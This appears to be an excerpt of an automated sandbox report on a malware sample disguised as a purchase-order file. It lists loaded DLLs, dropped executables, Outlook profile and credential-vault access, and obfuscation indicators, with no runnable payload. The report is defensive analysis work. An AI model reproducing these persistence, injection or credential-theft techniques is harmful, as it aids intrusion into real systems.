                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: credui.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: ieframe.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: netapi32.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: wkscli.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: mlang.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: winsqlite3.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: vaultcli.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeSection loaded: wininet.dll
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeSection loaded: mswsock.dll
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeSection loaded: dnsapi.dll
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeSection loaded: iphlpapi.dll
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeSection loaded: fwpuclnt.dll
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\runas.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                      Source: Pre Alert PO TVKJEANSA00967.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Pre Alert PO TVKJEANSA00967.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Pre Alert PO TVKJEANSA00967.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: runas.pdbGCTL source: RegSvcs.exe, 00000008.00000002.2069389047.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, nhClcdOjQwJ.exe, 00000011.00000002.2942271175.000000000051E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nhClcdOjQwJ.exe, 00000011.00000000.1994231473.000000000004E000.00000002.00000001.01000000.0000000D.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2941482691.000000000004E000.00000002.00000001.01000000.0000000D.sdmp
                      Source: Binary string: RegSvcs.pdb, source: runas.exe, 00000012.00000002.2943817151.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp, runas.exe, 00000012.00000002.2941572830.0000000000567000.00000004.00000020.00020000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000000.2137618964.0000000002E4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2364882227.00000000213EC000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000012.00000003.2069287148.0000000004154000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000012.00000003.2071135298.0000000004306000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, runas.exe, runas.exe, 00000012.00000003.2069287148.0000000004154000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000012.00000003.2071135298.0000000004306000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: QIoK.pdb source: Pre Alert PO TVKJEANSA00967.bat.exe, STiokuWkiGFJ.exe.0.dr
                      Source: Binary string: RegSvcs.pdb source: runas.exe, 00000012.00000002.2943817151.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp, runas.exe, 00000012.00000002.2941572830.0000000000567000.00000004.00000020.00020000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000000.2137618964.0000000002E4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2364882227.00000000213EC000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: QIoK.pdbSHA256 source: Pre Alert PO TVKJEANSA00967.bat.exe, STiokuWkiGFJ.exe.0.dr
                      Source: Binary string: runas.pdb source: RegSvcs.exe, 00000008.00000002.2069389047.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, nhClcdOjQwJ.exe, 00000011.00000002.2942271175.000000000051E000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.56c0000.4.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3ed5828.1.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, yWL2O9p29XpAZecQVf.cs.Net Code: lJKwEEFCCA System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, yWL2O9p29XpAZecQVf.cs.Net Code: lJKwEEFCCA System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeCode function: 0_2_0133C56B push cs; retf 0_2_0133C56E
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeCode function: 0_2_0133C7D3 push es; retf 0_2_0133C7D6
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeCode function: 0_2_0133C653 push cs; retf 0_2_0133C656
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeCode function: 0_2_01334659 push edx; retf 0002h0_2_0133465A
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeCode function: 0_2_013346BB push edx; retf 0002h0_2_013346BE
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeCode function: 0_2_0133C6AB push cs; retf 0_2_0133C6AE
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeCode function: 0_2_01335F28 pushad ; retf 0002h0_2_01336109
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00414A13 push edi; retf 8_2_00414A14
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0041837B pushad ; retf 8_2_0041837C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040D30D push 0CC2BE08h; iretd 8_2_0040D335
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004073F6 push 0000003Ch; iretd 8_2_004073F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00403510 push eax; ret 8_2_00403512
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00401F55 push esi; iretd 8_2_00401F58
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0156225F pushad ; ret 8_2_015627F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015627FA pushad ; ret 8_2_015627F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015909AD push ecx; mov dword ptr [esp], ecx8_2_015909B6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0156283D push eax; iretd 8_2_01562858
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0156135E push eax; iretd 8_2_01561369
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EFC54F push 8B00E867h; ret 14_2_00EFC554
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EFC54D pushfd ; ret 14_2_00EFC54E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EFC9D7 push edi; ret 14_2_00EFC9D9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EB09AD push ecx; mov dword ptr [esp], ecx14_2_00EB09B6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00E81368 push eax; iretd 14_2_00E81369
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00F07E99 push ecx; ret 14_2_00F07EAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00E81FEC push eax; iretd 14_2_00E81FED
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044B27FA pushad ; ret 18_2_044B27F9
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044B225F pushad ; ret 18_2_044B27F9
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044B283D push eax; iretd 18_2_044B2858
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044E09AD push ecx; mov dword ptr [esp], ecx18_2_044E09B6
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0050C191 push edi; retf 18_2_0050C194
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_00510811 push edi; retf 18_2_00510813
                      Source: Pre Alert PO TVKJEANSA00967.bat.exeStatic PE information: section name: .text entropy: 7.830225763539746
                      Source: STiokuWkiGFJ.exe.0.drStatic PE information: section name: .text entropy: 7.830225763539746
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, tdcDZMypNH7PsaTCGo.csHigh entropy of concatenated method names: 'H6JVaXkxc3', 'Iq1VgETuyl', 'WtlVowIyeC', 'PjEV5H1LOp', 'AJqVBPnKY2', 'LoFVtpXadO', 'eGBVv7v6IK', 'JFVVJJRCoA', 'E07VM7YseP', 'RXNVH2S04g'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, xrInpeof3ckfb86fea.csHigh entropy of concatenated method names: 'XPgXnF9l5g', 'IulX0DmRF7', 'FmbXbRSfwG', 'y48X8ZtMeL', 'd25XpdijKu', 'bB6bitPuBk', 'eqab9BLtEK', 'pZIbelQyTX', 'XacbLYGDMJ', 'DnvbIfktYO'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, M3QGeQ5V12q50oqTBB.csHigh entropy of concatenated method names: 'PebWXUn1y0rR0gtWLO1', 'xla6j4nEQwaRM3tX44f', 'uBAX4qSdKQ', 'mgyXfU1HcU', 'EgmXsqvHw8', 'g5CsvcnuIgFZmctTH21', 'EIhk9TnFS74dIUGy29H'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, aQhDVYZZFMpEXCVf19P.csHigh entropy of concatenated method names: 'w01sqWwDYX', 'NjIszLMuZo', 'dHQC2Nxos6', 'JZYCZlS8Dd', 'A3mCNLgnLG', 'kK5Ch817kC', 'R7yCwSXFsh', 'YDFCnqM8se', 'rEaC1T11XY', 'q5xC00xwEI'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, yV0CmLZwt7NHJnaqf2U.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'L39xfdWqVB', 'bGfxsDeWwQ', 'Pw3xCFM7w6', 'NgexxQWcB5', 'HA4xSBgybn', 'KxpxUgDgZH', 'GYRxdVljoY'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, sMVw2TvGvGBQ4b3d1C.csHigh entropy of concatenated method names: 'DVn810Qrte', 'Isi8D5i9r2', 'Mcg8XKZl5Y', 'YYnXqxsU9Q', 'xRKXzkiPhE', 'g7s82K4ORE', 'yms8ZgsyiM', 'Mis8NKyr4B', 'rhU8hgWQkN', 'QWC8wbaEsK'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, NVM2dOjp1O3yFqPMB9.csHigh entropy of concatenated method names: 'A638WcA5MV', 'CCc8QZoQQ2', 'hbG8EiAELx', 'D7K8GGle67', 'OAV87xMx1O', 'rEh8OksbYt', 'bA18cD8ZqH', 'V0U8aspjIV', 'Uk28gouG6W', 'M428rqLb2f'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, UXq1PwgSddWZQg1sZM.csHigh entropy of concatenated method names: 'lUfDGLKp4Q', 'xjWDOGgICk', 'NMhDap9wq3', 'B5hDgZIIbI', 'sNrDFCWoZF', 'gZwDAOP5ol', 'IQpD35jIrq', 'MDsD4OIBkK', 'txqDfyJMgi', 'HgDDsdeqYE'
